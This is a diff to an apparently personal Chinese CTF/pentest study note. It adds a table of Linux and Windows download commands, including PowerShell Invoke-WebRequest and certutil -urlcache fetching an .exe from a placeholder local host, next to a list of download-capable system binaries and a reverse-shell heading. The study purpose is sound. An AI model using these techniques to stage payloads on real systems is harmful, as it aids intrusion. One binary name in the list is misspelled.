记录本体项目代码修改部分

--- a/docs/views/numerology/2025-01-09-CTFLearn.md
+++ b/docs/views/numerology/2025-01-09-CTFLearn.md
@@ -67,6 +67,11 @@ Windows Server 2012 + 【[棱角社区文件下载命令生成工具](https://fo
 - Linux:  `wget  curl  python  ruby  perl  java`等
 - Windows: `PowerShell  Certutil Bitsadmin  msiexec mshta rund1132`等 
 
+|               | Linux                                            | Windows                                                      |
+| ------------- | ------------------------------------------------ | ------------------------------------------------------------ |
+| 常见下载命令1 | wget https://example.com/software.tar.gz         | powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/example.exe -OutFile example.exe" |
+| 常见下载命令2 | curl -O https://example.com/another_software.zip | certutil.exe -urlcache -split -f http://127.0.0.1:8080/example.exe example.exe |
+
 
 
 ## 反弹Shell
